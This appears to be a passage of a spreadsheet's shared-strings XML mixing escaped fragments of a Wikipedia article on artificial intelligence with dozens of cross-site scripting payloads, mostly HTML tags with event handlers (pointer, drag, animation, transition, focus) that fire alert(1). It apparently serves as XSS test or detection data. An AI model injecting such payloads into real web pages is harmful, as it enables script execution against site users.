    <t xml:space="preserve">&lt;li class="toclevel-1 tocsection-76"&gt;&lt;a href="#Further_reading"&gt;&lt;span class="tocnumber"&gt;14 </t>
  </si>
  <si>
    <t>&lt;shadow draggable="true" ondragleave="alert(1)"&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Gaussian_mixture_model" class="mw-redirect" title="Gaussian mixture model"&gt;Gaussian mixture model &lt;/a&gt;,&lt;sup id="cite_ref-Gaussian_mixture_model_226-0" class="reference"&gt;&lt;a href="#cite_note-Gaussian_mixture_model-226"&gt;&amp;#91;218&amp;#93; &lt;/a&gt; &lt;/sup&gt; and the extremely popular &lt;a href="/wiki/Naive_Bayes_classifier" title="Naive Bayes classifier"&gt;naive Bayes classifier &lt;/a&gt;.&lt;sup id="cite_ref-228" class="reference"&gt;&lt;a href="#cite_note-228"&gt;&amp;#91;i&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-Naive_Bayes_classifier_229-0" class="reference"&gt;&lt;a href="#cite_note-Naive_Bayes_classifier-229"&gt;&amp;#91;220&amp;#93; &lt;/a&gt; &lt;/sup&gt; Classifier performance depends greatly on the characteristics of the data to be classified, such as the dataset size, distribution of samples across classes, the dimensionality, and the level of noise. Model-based classifiers perform well if the assumed model is an extremely good fit for the actual data. Otherwise, if no matching model is available, and if accuracy (rather than speed or scalability) is the sole concern, conventional wisdom is that discriminative classifiers (especially SVM) tend to be more accurate than model-based classifiers such as "naive Bayes" on most practical data sets.&lt;sup id="cite_ref-Classifier_performance_230-0" class="reference"&gt;&lt;a href="#cite_note-Classifier_performance-230"&gt;&amp;#91;221&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-FOOTNOTERussellNorvig200918.12:_Learning_from_Examples:_Summary_231-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTERussellNorvig200918.12:_Learning_from_Examples:_Summary-231"&gt;&amp;#91;222&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Hospitality </t>
  </si>
  <si>
    <t>&lt;tr id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/tr&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;nextid id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;element style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/element&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;i&gt;&lt;a href="/wiki/Ramon_Llull#Ars_Magna" title="Ramon Llull"&gt;Ars Magna &lt;/a&gt; &lt;/i&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;element onpointerup=alert(1)&gt;XSS&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;main onpointerenter=alert(1)&gt;XSS&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;h1 style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset oncut="alert(1)" contenteditable&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;q draggable="true" ondragenter="alert(1)"&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;article onpointerover=alert(1)&gt;XSS&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;option id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;samp ondrop=alert(1) contenteditable&gt;drop here&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;mark id=x tabindex=1 onfocus=alert(1)&gt;&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;script onblur=alert(1) tabindex=1 id=x&gt;&lt;/script&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;video id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;code onbeforepaste="alert(1)" contenteditable&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Non-physical_entity" title="Non-physical entity"&gt;Non-physical entity &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;dl style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;var onmouseover="alert(1)"&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Philosophy_of_thermal_and_statistical_physics" title="Philosophy of thermal and statistical physics"&gt;thermal and statistical &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Computer_security" title="Computer security"&gt;Security &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;select id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/select&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;span class="mw-headline" id="Reasoning,_problem_solving"&gt;Reasoning, problem solving </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;530–541 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;br onpointerover=alert(1)&gt;XSS&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onpointerup=alert(1)&gt;XSS&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;rp onpointermove=alert(1)&gt;XSS&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;</t>
  </si>
  <si>
    <t>&lt;image onpointerenter=alert(1)&gt;XSS&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;ol onbeforepaste="alert(1)" contenteditable&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;image draggable="true" ondragend="alert(1)"&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;colgroup ondragover=alert(1) contenteditable&gt;drop here&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;hr id=x tabindex=1 onfocus=alert(1)&gt;&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;element oncut="alert(1)" contenteditable&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onmouseleave="alert(1)"&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://www.moma.org/calendar/exhibitions/3863"&gt;"Thinking Machines: Art and Design in the Computer Age, 1959–1989" &lt;/a&gt;. &lt;i&gt;The Museum of Modern Art &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;23 July </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;mark id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;7–21 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;title onkeypress="alert(1)" contenteditable&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onpointerenter=alert(1)&gt;XSS&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=51" title="Edit section: Existential risk"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;sup id=x tabindex=1 onfocus=alert(1)&gt;&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;ruby ondrop=alert(1) contenteditable&gt;drop here&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_agriculture" title="Glossary of agriculture"&gt;Agriculture &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;q onmousemove="alert(1)"&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;content draggable="true" ondragend="alert(1)"&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;head style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;img alt="Outline" src="//upload.wikimedia.org/wikipedia/commons/thumb/4/41/Global_thinking.svg/10px-Global_thinking.svg.png" decoding="async" title="Outline" width="10" height="16" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/4/41/Global_thinking.svg/15px-Global_thinking.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/4/41/Global_thinking.svg/21px-Global_thinking.svg.png 2x" data-file-width="130" data-file-height="200" /&gt; &lt;b&gt;&lt;a href="/wiki/Outline_of_computer_science" title="Outline of computer science"&gt;Outline &lt;/a&gt; &lt;/b&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;svg draggable="true" ondragenter="alert(1)"&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;object ondblclick="alert(1)"&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;content style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Robotics" title="Robotics"&gt;Robotics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;script draggable="true" ondragleave="alert(1)"&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(2011) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Software_design" title="Software design"&gt;Software design &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;header oncontextmenu="alert(1)"&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;hr onmouseenter="alert(1)"&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;label onbeforecopy="alert(1)" contenteditable&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div id="Glossaries_of_science_and_engineering" style="font-size:114%;margin:0 4em"&gt;Glossaries of science and engineering &lt;/div&gt; &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;td colspan="2" class="navbox-list navbox-odd" style="width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;mark onpointerup=alert(1)&gt;XSS&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;blink draggable="true" ondragstart="alert(1)"&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;i&gt;Infosys &lt;/i&gt;. 2018&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;14 January </t>
  </si>
  <si>
    <t>&lt;image draggable="true" ondragleave="alert(1)"&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onpointerenter=alert(1)&gt;XSS&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;applet onpointerenter=alert(1)&gt;XSS&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onpaste="alert(1)" contenteditable&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Robot_rights"&gt;Robot rights </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Tech+Insider&amp;amp;rft.atitle=The+mysterious+artificial+intelligence+company+Elon+Musk+invested+in+is+developing+game-changing+smart+computers&amp;amp;rft_id=http%3A%2F%2Fwww.techinsider.io%2Fmysterious-artificial-intelligence-company-elon-musk-investment-2015-10&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;blockquote id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup oncopy="alert(1)" contenteditable&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;content id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/content&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Entertainment_robot" title="Entertainment robot"&gt;Entertainment &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dd&gt;Much of what people know is not represented as "facts" or "statements" that they could express verbally. For example, a chess master will avoid a particular chess position because it "feels too exposed"&lt;sup id="cite_ref-FOOTNOTEDreyfusDreyfus1986_107-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEDreyfusDreyfus1986-107"&gt;&amp;#91;104&amp;#93; &lt;/a&gt; &lt;/sup&gt; or an art critic can take one look at a statue and realize that it is a fake.&lt;sup id="cite_ref-FOOTNOTEGladwell2005_108-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEGladwell2005-108"&gt;&amp;#91;105&amp;#93; &lt;/a&gt; &lt;/sup&gt; These are non-conscious and sub-symbolic intuitions or tendencies in the human brain.&lt;sup id="cite_ref-Intuition_109-0" class="reference"&gt;&lt;a href="#cite_note-Intuition-109"&gt;&amp;#91;106&amp;#93; &lt;/a&gt; &lt;/sup&gt; Knowledge like this informs, supports and provides a context for symbolic, conscious knowledge. As with the related problem of sub-symbolic reasoning, it is hoped that &lt;a href="/wiki/Situated_artificial_intelligence" class="mw-redirect" title="Situated artificial intelligence"&gt;situated AI &lt;/a&gt;, &lt;a href="/wiki/Computational_intelligence" title="Computational intelligence"&gt;computational intelligence &lt;/a&gt;, or &lt;a href="#Statistical"&gt;statistical AI &lt;/a&gt; will provide ways to represent this kind of knowledge.&lt;sup id="cite_ref-Intuition_109-1" class="reference"&gt;&lt;a href="#cite_note-Intuition-109"&gt;&amp;#91;106&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;/dd&gt; &lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;dl onmouseleave="alert(1)"&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Network_performance" title="Network performance"&gt;Network performance evaluation &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Swarm_robotics" title="Swarm robotics"&gt;Swarm &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;textarea id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT&gt;alert('');&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-AI_at_Stanford_in_the_60s-161"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-AI_at_Stanford_in_the_60s_161-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;template onblur=alert(1) tabindex=1 id=x&gt;&lt;/template&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;div oncopy="alert(1)" contenteditable&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">				&lt;div class="flaggedrevs_short_basic"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-AI_in_early_science_fiction-27"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-AI_in_early_science_fiction_27-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;link rel="search" type="application/opensearchdescription+xml" href="/w/opensearch_desc.php" title="Wikipedia (en)"/&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext draggable="true" ondragstart="alert(1)"&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Hans_Reichenbach" title="Hans Reichenbach"&gt;Hans Reichenbach &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onbeforecopy="alert(1)" contenteditable&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;datalist draggable="true" ondragleave="alert(1)"&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;They failed to recognize the difficulty of some of the remaining tasks. Progress slowed and in 1974, in response to the criticism of &lt;a href="/wiki/Sir_James_Lighthill" class="mw-redirect" title="Sir James Lighthill"&gt;Sir James Lighthill &lt;/a&gt;&lt;sup id="cite_ref-FOOTNOTELighthill1973_40-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTELighthill1973-40"&gt;&amp;#91;40&amp;#93; &lt;/a&gt; &lt;/sup&gt; and ongoing pressure from the US Congress to fund more productive projects, both the U.S. and British governments cut off exploratory research in AI. The next few years would later be called an "&lt;a href="/wiki/AI_winter" title="AI winter"&gt;AI winter &lt;/a&gt;",&lt;sup id="cite_ref-First_AI_winter_11-1" class="reference"&gt;&lt;a href="#cite_note-First_AI_winter-11"&gt;&amp;#91;11&amp;#93; &lt;/a&gt; &lt;/sup&gt; a period when obtaining funding for AI projects was difficult.</t>
  </si>
  <si>
    <t>&lt;b onpaste="alert(1)" contenteditable&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onbeforecopy="alert(1)" contenteditable&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation magazine"&gt;Roberts, Jacob (2016). &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20180819152455/https://www.sciencehistory.org/distillations/magazine/thinking-machines-the-search-for-artificial-intelligence"&gt;"Thinking Machines: The Search for Artificial Intelligence" &lt;/a&gt;. &lt;i&gt;Distillations &lt;/i&gt;. Vol.&amp;#160;2 no.&amp;#160;2. pp.&amp;#160;14–23. Archived from &lt;a rel="nofollow" class="external text" href="https://www.sciencehistory.org/distillations/magazine/thinking-machines-the-search-for-artificial-intelligence"&gt;the original &lt;/a&gt; on 19 August 2018&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;20 March </t>
  </si>
  <si>
    <t>&lt;form onpointerout=alert(1)&gt;XSS&lt;/form&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div id="Computer_science" style="font-size:114%;margin:0 4em"&gt;&lt;a href="/wiki/Computer_science" title="Computer science"&gt;Computer science &lt;/a&gt; &lt;/div&gt; &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;td class="navbox-abovebelow" colspan="2"&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;nobr ondrop=alert(1) contenteditable&gt;drop here&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;blink onkeyup="alert(1)" contenteditable&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;article onkeydown="alert(1)" contenteditable&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Idea" title="Idea"&gt;Idea &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;caption style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;source onpointermove=alert(1)&gt;XSS&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Allenna_Leonard" title="Allenna Leonard"&gt;Allenna Leonard &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;main onkeypress="alert(1)" contenteditable&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Philosophy_of_physics" title="Philosophy of physics"&gt;Physics &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;details draggable="true" ondragstart="alert(1)"&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onpointerenter=alert(1)&gt;XSS&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;object onmouseleave="alert(1)"&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;ol onpointerover=alert(1)&gt;XSS&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;217–225, 280–294 &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;q&gt;After a half-decade of quiet breakthroughs in artificial intelligence, 2015 has been a landmark year. Computers are smarter and learning faster than ever. &lt;/q&gt; &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Bloomberg+News&amp;amp;rft.atitle=Why+2015+Was+a+Breakthrough+Year+in+Artificial+Intelligence&amp;amp;rft.date=2015-12-08&amp;amp;rft.aulast=Clark&amp;amp;rft.aufirst=Jack&amp;amp;rft_id=https%3A%2F%2Fwww.bloomberg.com%2Fnews%2Farticles%2F2015-12-08%2Fwhy-2015-was-a-breakthrough-year-in-artificial-intelligence&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;thead id=x tabindex=1 onactivate=alert(1)&gt;&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;address onpointermove=alert(1)&gt;XSS&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;section id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;select autofocus onfocus=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation book"&gt;Daniel Merkle; Martin Middendorf (2013). "Swarm Intelligence".  In Burke, Edmund K.; Kendall, Graham (eds.). &lt;i&gt;Search Methodologies: Introductory Tutorials in Optimization and Decision Support Techniques &lt;/i&gt;. Springer Science &amp;amp; Business Media. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-1-4614-6940-7" title="Special:BookSources/978-1-4614-6940-7"&gt;&lt;bdi&gt;978-1-4614-6940-7 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=bookitem&amp;amp;rft.atitle=Swarm+Intelligence&amp;amp;rft.btitle=Search+Methodologies%3A+Introductory+Tutorials+in+Optimization+and+Decision+Support+Techniques&amp;amp;rft.pub=Springer+Science+%26+Business+Media&amp;amp;rft.date=2013&amp;amp;rft.isbn=978-1-4614-6940-7&amp;amp;rft.au=Daniel+Merkle&amp;amp;rft.au=Martin+Middendorf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;u id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;i&gt;&lt;a href="/wiki/Human_Compatible" title="Human Compatible"&gt;Human Compatible &lt;/a&gt; &lt;/i&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;frame draggable="true" ondragleave="alert(1)"&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Logic_as_search-186"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Logic_as_search_186-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;menuitem onkeyup="alert(1)" contenteditable&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;svg id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onmousedown="alert(1)"&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;code id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/code&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;ul class="menu" &gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;&lt;span class="mw-headline" id="Explanatory_notes"&gt;Explanatory notes </t>
  </si>
  <si>
    <t>&lt;datalist onmouseover="alert(1)"&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;br onpointerleave=alert(1)&gt;XSS&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Alchemy" title="Alchemy"&gt;Alchemy &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article"&gt;</t>
  </si>
  <si>
    <t>&lt;section onmouseenter="alert(1)"&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;option onmousedown="alert(1)"&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onmouseenter="alert(1)"&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;article onkeypress="alert(1)" contenteditable&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot draggable="true" ondrag="alert(1)"&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;image onblur=alert(1) tabindex=1 id=x&gt;&lt;/image&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;command style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/benchmarking.html"&gt;Benchmarking&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;col oncopy="alert(1)" contenteditable&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;718 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Knowledge_extraction" title="Knowledge extraction"&gt;Knowledge extraction &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;main oncontextmenu="alert(1)"&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onmouseover="alert(1)"&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Database" title="Database"&gt;Database management system &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
